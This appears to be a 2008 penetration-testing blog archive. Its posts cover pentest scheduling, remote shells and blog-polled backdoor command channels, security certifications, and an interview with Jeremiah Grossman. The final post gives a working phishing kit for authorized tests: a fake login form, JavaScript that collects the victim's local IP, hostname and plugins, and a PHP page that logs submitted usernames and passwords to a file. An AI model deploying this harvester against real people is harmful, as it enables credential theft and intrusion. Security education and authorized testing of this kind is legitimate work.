Wednesday, April 30, 2008

Penetration Testing Scheduling


There is a thread over on the pentest list about Penetration Testing Scheduling
http://seclists.org/pen-test/2008/Apr/index.html#135

The question posed was "I've heard a lot of folks say that telling your customers exactly when you will begin the testing is not suitable, but I'm not sure as to why they that... Can anyone define for me the right approach? -- Do you plan the assessment and let them know it's within a week or so, or do you simply inform them the date and time specifically?"

The obvious answer to this question is that it depends on scope and ROE.

If the client is testing to see how far you can go with a single shell/vulnerability/phish attack or how/if an IDS/Incident Response team reacts to your scans or attacks then it wouldn't make sense to tell them your hours of operations. Your "guy"inside should probably know whats going on or be able to call you to do deconfliction if necessary but in that situation you certainly wouldn't want the email going out to all users or all admins to ignore all malicious traffic coming from IP W.X.Y.Z.

There is also good reason not to give specifics because people tend to go on their patch frenzy right before or, even worse, during your pentest. Nothing sucks more is to come back the next day to see a vulnerable host was patched over night when it was some old ass exploit like 06-040 or DCOM. Hope you already did all your data mining!

But, if you are there to find EVERY damn vulnerability you can find, everyone knows you are there, and you are probably going to run with credentials to check patch versions and what not, then i wouldn't see any reason not to tell people your schedule to minimize any undue stress or freaking out by the IDS/IH team

The first two examples simulate a determined attacker and arent necessarily there to find EVERY vulnerability on a network. I personally feel most organization can get most of the low hanging fruit like that themselves running nessus or vulnerability scanner X on their network. You dont need to bring someone in to run nessus, but i'll gladly do it and take your money.

A pentest should be another set of eyes to see what you missed and to see what can happen once that initial foothold is gained or to test the "exploitability" of vulnerabilities, things that scanners can not and do not do.
CG

Sunday, April 20, 2008

Remote Ops and Pentesting


I'm trying to catch up on some posting, hopefully Jesus doesn't mind me using his day to do that...

Last assessment I was on I was on the "remote" end of the shell. We had people in another state doing the on site and sending shells back so we could simulate remote and local attackers.

interesting things come up when you have people looking for your outbound shell, mostly WTF do you do when your connect back domain name is poisoned or your IP blocked and how do you hide that traffic. maybe in some cases that 3am hack sessions ISNT a good idea better to blend in with that morning checking email traffic.

at BH D.C. Sinan Eren gave his IO Immunity Style talk, it was a good talk and interesting considering they were able to take all the time they needed and 0day was ok. But most importantly was their backdoor PINK. PINK help solve some of the C&C problems with botnets or even backdoors, namely how do I keep tabs on the boxes even though i dont necessarily want them to do anything. PINK had a pretty cool way of doing that where you put commands on a blog (signed and encrypted...booyah) and the backdoor would go out and query that page for what to do next, pretty cool way of doing it. It would also wait and only do those queries if there was activity on the box i dont remember if it was network activity or just keyboard/mouse activity either way it was a good idea. only sending web traffic when someone was actually logged in is definitely a better way to blend in.

Tom Liston also talked about some malware at last year's ChicagoCon that would query some website and get its command from comments in the HTML code, again pretty slick.

so what's the point, i guess the point is cover your ass and have multiple ways of keeping that communication going or really know your target's monitoring capabilities to see what method will best keep your shell.

useful links:

http://ha.ckers.org/blog/20080127/process-doubling/

not so much the post but the comments are good

http://www.immunityinc.com/downloads/BeyondFastFlux.odp
mention's PINK
http://www.blackhat.com/presentations/bh-dc-08/Eren/Presentation/bh-dc-08-eren.pdf
IO Immunityinc style talk
CG

WTF Business Software Alliance


Have things really come down to this???

Snitching on your company or friends for a quick buck? The irony of course is that banner was on a security forum that pretty much caters to the last group of people that would pay for software.
CG

Not a CISSP ?!?!


Chris Eng over at veracode has an interesting post on their blog about immunityinc's "not a cissp" button.

If you've been under a rock, here is the button:


I've got mixed feelings about the button. For one thing, I've seen a couple of CISSPs wearing that button at defcon/shmoocon, i guess they were practicing some SE. But secondly, its easy for people in the top 5% of the security game to say you don't need certifications because they (most importantly) already have that level of experience and name recognition. Dave Aitel doesn't need to take a test and throw some letters after his name to prove to anyone he knows his stuff, he proved himself long ago but i cant imagine he came out of the womb with that much fu, maybe he did I don't know.

For us mere mortals who are just trying to get a paycheck and get some experience alot of places are requiring certifications to be on the contract or get the job or even to get your resume to the hiring manager. For .mil/.gov this is because of 8570. To me, requiring certifications is a step in the right direction. Since no one has come forward with a scalable "hands-on" way to certify people, that paper test (for now) will have to do. At least people are trying to get qualified people in the slots, saying CISSP or some other cert makes you automatically qualified is another matter.

I'll be the first one to agree with Chris that "that like many security certifications, it’s an ineffective measure of a security professional’s practical abilities." See my CEH != Competent Pentester post but the game is the game. If you have to sit for a test to do/get the job then stop bitching and take your test and move on with it. If you want to stand your ground and just bitch and not get the job, enjoy your time on the geek squad.
CG

Wednesday, April 16, 2008

LSO quoted on security.magnus.de


Hey LearnSecurityOnline.com got a shoutout on security.magnus.de

http://security.magnus.de/artikel/sicherheitstests-security-check-mit-metasploit-3-meterpreter.html

translated

translated quote:

" How can I get power over foreign computer? --That is a central question of all crackers. Exploits are the answer: They bring a computer cracker, to do what they want. So says the computer security side Learn Security Online www.learnsecurityonline.com together."

not sure where he got the quote, but hey i'll take it.

orginal screenshot:




translated screenshot:



neat!

CG

Tuesday, April 15, 2008

4 words...Developers, Developers, Developers, Developers


Joe and I were reminiscing about Defcon X and this video, thought i'd share for those of you that had never seen it or for those of you that used to rock out Defcon and now rock out at RSA


CG

Friday, April 11, 2008

CEH/CPTS Certification != competent pentester


Dean and I have talked about this more times than i can count and finally a discussion has taken place over on the pentest list about automated pentesting and a pentester's experience. The thread is here: "Penetration Testing Techniques" I wont get into all the issues wrong with whats going in the post. I'm going to harp on experience and certifications

from thread: http://seclists.org/pen-test/2008/Apr/0039.html

"Well, the results are definitely verified through nmap as well.OS is
win 2k3 running IIS 6.0 and only 80 being open.Yes indeed the client
has assigned us the job to perform the pen test and knows about it.
I do have the CPTS training dvd and am going through that, but it will
take time to digest that horde of information.Also downloading web
goat to get my hands wet with web app testing."

While the thread is initially about CORE IMPACT not finding any vulnerabilities with this particular server, the underlying issue is the lack of experience someone has and them being hired to do a pentest. Its a reoccurring thread on other sites as well; "Hey, I got my CEH, who wants to hire me to be a pentester" :-(

Bottom line, tools are just tools, they help humans get jobs done. They aren't and shouldn't be the only thing used on a pentest. The other point is experience is king, granted the original poster is getting experience, but giving CORE to a brand new tester is not going to help them get better. there is a reason A LOT of subjects are taught the hard way first then you get taught "the shortcut." Oh, and passing a multiple choice test is not a real demonstrable measure of ability.

Let me also add that if one of my employees posted some crap like that, i'd seriously be considering them finding another place to get their experience.

want to learn the right way? check out LearnSecurityOnline's Learning Model. LSO isnt the end all be all of security, but i think the Learning Model and the Core and Advanced Competencies is a solid foundation for any security professional.

Here are the Core & Advanced Competencies:

Four Core Competencies
• Operating Systems
• Networking
• Programming
• IT/IT Security Resources

Advanced Competencies
• Documentation, Policies, Procedures, Disaster Recovery
• Cryptography
• Forensics
• Penetration Testing
• Security Industry Certifications
CG

Thursday, April 10, 2008

Interview with Jeremiah Grossman on LearnSecurityOnline.com


Originally published on LearnSecurityOnline.com

http://learnsecurityonline.com/index.php?option=com_content&task=view&id=297&Itemid=0

# LSO #
How about some background about yourself, who you are? What you do? Who you work for? Location?

# JG #
I started out as a graphic designer; turned to a Web developer then UNIX admin, then Web security guy. Today, I’m founder and CTO of WhiteHat Security, a leading provider of website vulnerability management services headquartered in Santa Clara, Ca.

I was raised in Maui, Hawaii and grew up in Silicon Valley. I’ve been commonly referred to as one of the top Web security experts, recognized as one of InfoWorld 2007 Top 25 CTOs, and all that sort of fluffy stuff. Personally, I prefer engineer and entrepreneur. My daily job consists of delivering presentations, R&D for future products and services, speaking with a lot of companies and learning about their Web security challenges, and helping out with the Web Application Security Consortium (WASC). I write a lot too. Blog, books, articles, interviews. :-)

# LSO #
How did you get into the security business (your specific field)?

# JG #
While working at Yahoo pen-testing websites, I found I had far too much work and not enough time to do it. If every one of the 600 websites took 40 hours to assess for vulnerabilities, it would take me roughly 11.5 years to finish. Unless we hired a team of 10, no solution available was going to meet our needs. This was not a problem unique to Yahoo: Many companies across the industry were experiencing the same dilemma. They know they have vulnerabilities needing to be fixed and no idea where they’re located. I saw a market opportunity, set out to build a better solution, and jumped in with both feet. WhiteHat’s executive staff envisioned a highly scalable vulnerability assessment Software-as-a-Service solution incorporating proprietary, automated scanning with expert analysis. Six years later here we are. Now, how I got my Job at Yahoo is a whole other story. ;)

http://jeremiahgrossman.blogspot.com/2007/04/how-i-got-my-start.html

# LSO #
You are considered to be on of the forerunners of Web Security. I remember seeing your talks at Blackhat in 2002 when you released the WhiteHat Arsenal and being totally blown away at what you could do with a web browser and the browser has only become more and more powerful over the years. In your opinion, Are we past the worst of web vulnerabilities, there now, or is the worst yet to come?

# JG #
Wow, has it been that long? On the positive side, unless someone finds a truly new attack technique, the number of vulnerabilities in the average website will likely slowly decline in the years to come. The downside is the attackers will have a lot of green field to exploit and they haven’t even really begun to hack. Unfortunately the worst is yet to come and we’ve already seen some fairly bad stuff happen to date.

# LSO #
Web 2.0 and Ajax. Is it the end of the world as we know it? or just another technology in the mix?

# JG #
Y2K didn’t end the world, so why should Web 2.0 and Ajax? Web 2.0 is the way we’re using the Web, and Ajax is a set of technologies developers used to build it. Others don’t share my view, but I don’t think either Web 2.0 or Ajax makes a website more susceptible to attack. They all have the same problems in the same ways, just a lot faster and easier to make mistakes. What has changed though is our capacity to find vulnerabilities in Ajax-laced websites. You see, the bad guys really don’t need or use scanners to hack websites because they only need to find one issue; and, it’s faster to do it by hand. The good guys on the other hand have to find all issues and protect against them all - all the time. That means the good guys need scanners to keep up. The problem with scanners though is they’ve shown to be severely lacking in Ajax support despite the marketing claims. Not to mention the volume of false positives they generate.

# LSO #
How do you think technical aspects of web hacking have changed over time and how does one keep up with the current advances?

# JG #
The basics have been the same for quite a while, but the advanced stuff is getting fairly large, sophisticated, and constantly evolving. The nuances of Web security takes a while to learn if you start from zero. The only way I’m personally able to keep up is by reading a tremendous amount and communicating as often as I can with others. So, I read white papers, mailing lists, blogs, news stories, etc. I also attend conferences, contribute to community projects, and utilize email quite heavily.

# LSO #
Say I want to get into web security, it HUGE, where do i start?

# JG #
At the beginning! No seriously. If I had to start again, the first thing I’d do is pick up a programming language like Java or C# and develop my own super simple Web applications to get the basic concepts. Then, I’d seek to understand how the Web is architecturally put together from the ground up. That means learning everything I could about TCP/IP, HTTP, DNS, SSL, and general encryption. I’d make my own Web servers and Web browsers, create little tools to create packets in the various protocol layers, and basically play around with all the technology till I felt really comfortable. Then, I’d work my way back up the stack learning HTML, JavaScript, and the DOM, all the while making little applications to keep my interest. But, what you’re probably asking at this point is “where is the security,” right?

From my point of view, security is a state of mind more than anything else. I’ve always felt that if I understood all aspects of the technology to an intimate degree, then “security” portions became super easy. If I knew how everything worked, was meant to work, then I could proceed to test if I could make it work in ways other than intended.

Some early books on my bookshelf:

The Protocols (TCP/IP Illustrated, Volume 1)
http://www.amazon.com/Protocols-TCP-IP-Illustrated/dp/0201633469/ref=
pd_bbs_sr_1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682211&sr=8-1


TCP/IP Network Administration (3rd Edition; O'Reilly Networking)
http://www.amazon.com/TCP-Network-Administration-OReilly-Networking/dp/0596002971
/ref=pd_bbs_sr_1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682225&sr=8-1

UNIX System Administration Handbook (3rd Edition)
http://www.amazon.com/UNIX-System-Administration-Handbook-3rd/dp/0130206016/ref=
pd_bbs_sr_1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682255&sr=8-1


Applied Cryptography: Protocols, Algorithms, and Source Code in C, Second Edition
http://www.amazon.com/Applied-Cryptography-Protocols-Algorithms-Source/dp/0471117099/ref=
pd_bbs_sr_1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682281&sr=8-1


DNS and BIND
http://www.amazon.com/DNS-BIND-5th-Cricket-Liu/dp/0596100574/ref=pd_bbs_2/104-1693213-7738351?
ie=UTF8&s=books&qid=1193682300&sr=8-2

Mastering Regular Expressions
http://www.amazon.com/Mastering-Regular-Expressions-Jeffrey-Friedl/dp/0596528124/ref=pd_bbs_sr_
1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682314&sr=8-1


JavaScript: The Definitive Guide
http://www.amazon.com/JavaScript-Definitive-Guide-David-Flanagan/dp/0596101996/ref=
pd_bbs_sr_1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682325&sr=8-1


# LSO #
You mention in your interview with Colleen Frye about the disclosure dilemma. What are your thoughts on disclosure? I think its a double edged sword because, let's face it, 0-days and worms keep system admin, network managers, pen-testers, and consultants in business but it seems alot of vendors are pushing the no-disclosure (or only to us) route.

# JG #
For the most part, I’m in the non-disclosure camp. Meaning: I only privately disclose vulnerabilities when I have a good working relationship with the other party. And, if I release something publicly, it’s only because I feel the attack technique is new and has further implications that would benefit by public research. Be mindful though that I would not recommend people blindly follow my philosophy. Instead, they should find a system that works within their personal code of ethics, morals, professionalism, and level of risk acceptance. Because let’s face it, the industry is not what it used to be 10 to 15 years ago and already has pushed much of the research underground.

# LSO #
do you think that's good for the industry? is it good to push all that research underground?

# JG #
I take a pragmatic approach to security and I feel that business owners and software vendors have a responsibility for the data they protect and the products they sell. We all must take into consideration the environment around us, and understand that it’s hostile. We should have no expectation that anyone is going to share any vulnerability information ahead of time. We can hope they will before going public. But, do not depend on it and frankly it’s hopeless to demand it.

# LSO #
on a similar note, what are your thoughts on the German anti-hacking laws and what do you think would happen to security industry if the US went that route?

# JG #
I don’t think we have to wait for that to happen; it’s probably already here and just haven’t realized. When considering our current political climate and recent legal changes in the U.S., it seems to me that any one of us could easily be accused of committing an illegal act and be held to account. All that really has to happen is for a few more high profile prosecutions to impact security researchers to have a nasty and lasting side effect. What I do think is coming is export controls placed on vulnerability information (0-days), just like they do on encryption - because of their potential impact on national security. It’s a brave new world.

# LSO #
Do you think JavaScript is the new shellcode? If so why?

# JG #
Yes, definitely, because Cross-Site Scripting in the new buffer overflow. ;)

# LSO #
Tell us what you think of the future of network enumeration via JavaScript. What are the attacks that we should look for in the coming years from JavaScript?

# JG #
It’s difficult predicting the future in security, but if I had to guess, I could see phishers using XSS a lot more. The malware guys will continue defacing highly trafficked and trusted websites to exploit their visitors’ Web browsers. And the high-end espionage attack types will go for the Intranet hacking stuff using JavaScript malware. It’s the latter that’ll be hard to track, measure, and defend.

# LSO #
Can you compare/rate the criticality of XSS, XSRF, SQLI?

# JG #
Unfortunately no. It’s hard to generalize their severity, criticality, threat, etc. For the most part, website vulnerabilities have to be rated individually, while taking into consideration the value of the website, the data it contains, and the sophistication of the attack required.

# LSO #
Have you or anyone you are aware of made any progress on your non-JavaScript port scanning idea that you posted here at:
(http://jeremiahgrossman.blogspot.com/2006/11/browser-port-scanning-without.html)

# JG #
Ilia Alshanetsky certainly took the next step by improving the speed of my original designs, but I think I’ve personally taken that concept about as far as I need to. The Intranet zone has been breached and the rest just seems to be adding insult to injury. No need to make exploitation easy for the bad guys. It’s the browser vendors turn to remediate the problem architecturally.

# LSO #
How real of an attack vector is DNS-Rebinding? How prevalent do you think it is in the wild?

# JG #
DNS-Rebinding (Anti-DNS Pinning) spent several years in the realm of the theoretical obscurity, but that changed recently when more researchers demonstrated creative Proof of Concepts. It’s a very powerful attack vector with a lot of potential damage. Worse still is that I think the browser vendors are at a loss for how to deal with the problem. It’s also difficult to tell if the bad guys are using this in the wild maliciously. Unfortunately, we’ll know when the side effects get really bad and we’ll find the attack being used in a piece of malware.

# LSO #
Are people really vulnerability scanning internal networks with Nessus/Metasploit through a socks proxy?

# JG #
Not that I’m aware of.

# LSO #
Can you tell us a little bit about WhiteHat Sentinel? Have appliances taking the human out of the network security and web security loop (minus the people writing the checks for the appliances)?

# JG #
Nah, human expertise will be a vital part of any comprehensive Web application vulnerability assessment process, forever. Unless of course someone solves the halting problem or websites magically become “secure enough”, but I doubt it.

WhiteHat Sentinel is a website vulnerability assessment and management service that is customer controlled and expert managed. Without the marketing-fu, that means our customers websites receive a complete vulnerability assessment whenever they’d like or as often as their website changes, with the security of knowing they have the expertise of WhiteHat engineers as support. Presently, we’re performing hundreds of vulnerability assessments each week, many orders of magnitude above anyone else, with the significant added benefit of the false positives weeded out. To deliver this type of service is no small task and it’s really our SaaS technology that enables WhiteHat to have this incredibly efficient process. Our remotely hosted vulnerability scanning infrastructure does all the heavy lifting and also allows us to configure custom tests for each website to identify those pesky business logic flaws.

# LSO #
What can i do to keep mom and dad safe on the net? Or anyone who gives you the "huh" when you go into phishing, hacking, XSS, CRSF, malware, etc?

# JG #
The most effective way to keep them safe is to switch them to a Mac. Sorry Windows people, but your operating system is target #1. And, for the same reason swap out Internet Explorer for Firefox, Mozilla, or Opera. These two acts alone will significantly reduce the likelihood of their machine getting hacked. Then, disable Active X, java, and unless they really complain about it, flash to. And, for good measure, install SafeHistory and Adblock Plus. To keep them from getting phished, teach them to be skeptical of any email from someone they don’t know, especially the ones with links and/or attachments. Instead of clicking on links in their email, set up a list of bookmarks to select for their bank and other important business oriented websites.

# LSO #
How important do you feel that programming is for this field, specifically how do you feel about Web Language programming? If yes, what language(s) do people need to know well?

# JG #
The best Web security experts in my experience have Web development background. Most any Web language works just fine, since we’re all niche practitioners anyway. HTML/JavaScript are a must no matter what. But if you had to start now. .Net and Java and their development frameworks are what you need to know to an intimate degree.

# LSO #
What tools need to be in every web application pen-tester's toolkit?

# JG #
Three different Web browsers (at least), a proxy or two, and some text encoders and decoders.

# LSO #
What are the basics that you think every security person should know?

# JG #
For me, the key things that I’ve come to appreciate are that technology skills can be learned over time, but for many it’s difficult to grasp certain fundamental information security concepts. That security is a state of mind, that it is a process and not a product, and that it is our responsibility to mitigate risk. Anyone can spend a bit of time to learn how to properly configure a firewall, but do they know why they are doing it? What are the attacks they hope to thwart or don’t address? What business challenges crop up as a result of firewall implementation?

The point is we have to question our assumptions, our conventional wisdom, and constantly check to ensure they still hold true. Often they do not.

# LSO #
Any suggestions on breaking into the security field? Or someone considering security for a career?

# JG #
Get involved in anyway and at any level you can. This could be an entry-level job, contributing to a community effort, or participating in a mailing list discussion. Read everything (white papers, articles, blogs, etc). Email the authors and ask tough questions. Attend conferences and local chapter meetings.

The whole idea is to meet people, build relationships, and learn everything you can by helping out. This also demonstrates your passion and value to those you interact with. Nothing says more to an employer (or a recruiter) than personal initiative and self-motivation.

# LSO #
Jeremiah, thanks tons for all your work in the industry and for agreeing to the interview.

Jeremiah Grossman
Blog: http://jeremiahgrossman.blogspot.com/
Book: XSS Attacks: Cross Site Scripting Attacks and Defense
CG

Saturday, April 5, 2008

Shotgun Blast 06 April 08


CG

Phishing Revisited


As Chris mentioned in a previous post we used social engineering and phishing emails as an attack vector. The scope of the engagement prevented us from collecting any data that could be used to identify the user. The client was not out to make examples of their staff but to see how well their education and training programs were working. I commend that approach as our goal as pentesters is not to simply own the network (well it is. :)) but we are also there to provide the data and metrics to help improve the client's overall security.

But what if the scope required that you use the phishing attack to capture user data and even possibly, as Chris stated, upload and use the credentials of the user to dig deeper into the network.

Let's take a look at how you can use a simple page containing some javascript and php (or perl) to accomplish this. First let us determine what we are looking to collect from the client machine and user. One restriction is we cannot upload anything (backdoor, etc...) to the client machine. So what can we collect then? We can collect the credentials (username/password) entered by the user, computer's hostname, local and remote IP Addresses, Firefox plugins and more. Let's assume that we are using the same phish as in the previous post. We are going to use the same perl mass mailer and the same html pages. Well that's great but how do you collect all that data?

Let's start with the page we want the user to see when they click on the link in the email. We'll call it login.html, a fake login page. I will simply show the code need to begin collecting the data. I'll leave the design and layout up to you.

A few simple text boxes and a submit button is all that is needed to begin the process of collecting the username and password of the user.
<form method="POST" name="login" action="result.php" onsubmit="return process_target()">
<table cellspacing="5" bgcolor="#C0C0C0">
<tr><td width="100">Username:</td><td><input type="text" size="20" name="username" /></td></tr>
<tr><td>Password:</td><td><input type="password" size="20" name="password" /></td></tr>
<tr><td colspan="2">&nbsp;</td></tr>
<tr><td><input type="submit" value="Login" /></td><td><a href="forgot.html">Forgot your password?</a></td></tr>
</table>
<input type="hidden" name="local_ip" />
<input type="hidden" name="hostname" />
<input type="hidden" name="plugins" />
</form>
Well, that is simple enough, we can send that data anywhere we want. If you don't mind grepping through webserver logs you don't even need to send it to another page, file or database, you can simply seach for the strings in your server logs. Looking at the code you'll notice the javascript onsubmit() event. Why? Well this is where we begin to add to our code and start to do some cool stuff. We use the onsubmit() event to call the process_target() function. We are going to use javascript's ability to invoke java classes directly from within Firefox. We are going to use java.net.Socket() class with to determine the local IP address and hostname of the target machine. This is great if the user is behind a NAT'd firewall or router.

Originally my code used the java.net.InetAddress class to obtain the IP address. Lenny Zeltser found that it was not always reliable and sometimes did not return an address at all during testing. Annoying! So Lenny suggested the following code that works perfectly.

<script>
function process_target() {

window.onerror=null;

try {

var sock = new java.net.Socket();
sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
document.forms[0].local_ip.value = sock.getLocalAddress().getHostAddress();
document.forms[0].hostname.value = sock.getLocalAddress().getHostName();

for (var index = 0; index < navigator.plugins.length; index++)
document.forms[0].plugins.value = document.forms[0].plugins.value + navigator.plugins[index].name + "; ";

} catch (e) {}

}
</script>
In addition to the local IP and hostname we are also able to determine the Firefox plugins (media player, quicktime, flash, etc...). Excellent!!

Now we need to retrieve this data and while we're at it let's see what other data we can determine from the remote machine. The second page, result.php, a fake login failure page is going to be used to receive that data from login.html and write it to a text file on our server. I normally format this page to look like a legitimate error page. with a nice message for the user to contact the help desk.

Let's take a look at the code and how using PHP's global variables we're able to capure more data about the user's environment.

<?php

$file="data.txt";
$register_globals = (bool) ini_get('register_globals');

/* Capture user-submitted data. */
$uid = $_POST['username'];
$pass = $_POST['password'];

/* Capture additional data collected via Java */
$local_ip = $_POST['local_ip'];
$hostname = $_POST['hostname'];
$plugins = $_POST['plugins'];

/* Capture environment variables */
$rem_ip = $_SERVER['REMOTE_ADDR'];
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ('dS \of F Y h:1:s A');

/* Write data to file */
$log=fopen("$file", "a+");
fputs($log, "DATE: $date\nUSER: $uid\nPASSWORD: $pass\nLOCAL IP: $local_ip\nREMOTE IP: $rem_ip\nPORT: $rem_port\nHOST: $hostname\nUSER AGENT: $user_agent\nREFERRER: $referer\nPLUGINS: $plugins\n\n");
fclose($log);
?>
We make use of the server variables provided by PHP. $_SERVER is an array that contains information such as headers, paths, and script locations. For additional options check out the PHP manual here. The next step is to place a text file called data.txt on your webserver. Ensure that this file is both readable and writable as our result.php page as we will be using fputs() to append the results to this file.

Ok, Let's see what we now have the ability to capture :
username and password, local and remote IP, hostname, remote port, Firefox plugins, the user-agent string and referrer and for good measure we collect the date and time as well and write it all to a text file to review and use in other areas of the engagement.

I hope that helps show how simple and how powerful a phishing attack during a pentest can be. We did not even need to install a back door. The change in attack vector of choice from remote to client-side exploits by attacks is seen in more and more cases. It's now becoming even more important that you inform your client of the dangers client-side attacks. I've shown you two options in this and the previous post that don't actually compromise the remote host but do give you valuable data to use for improving awareness programs or gaining additional access to the network.

Cheers,
Dean

dean de beer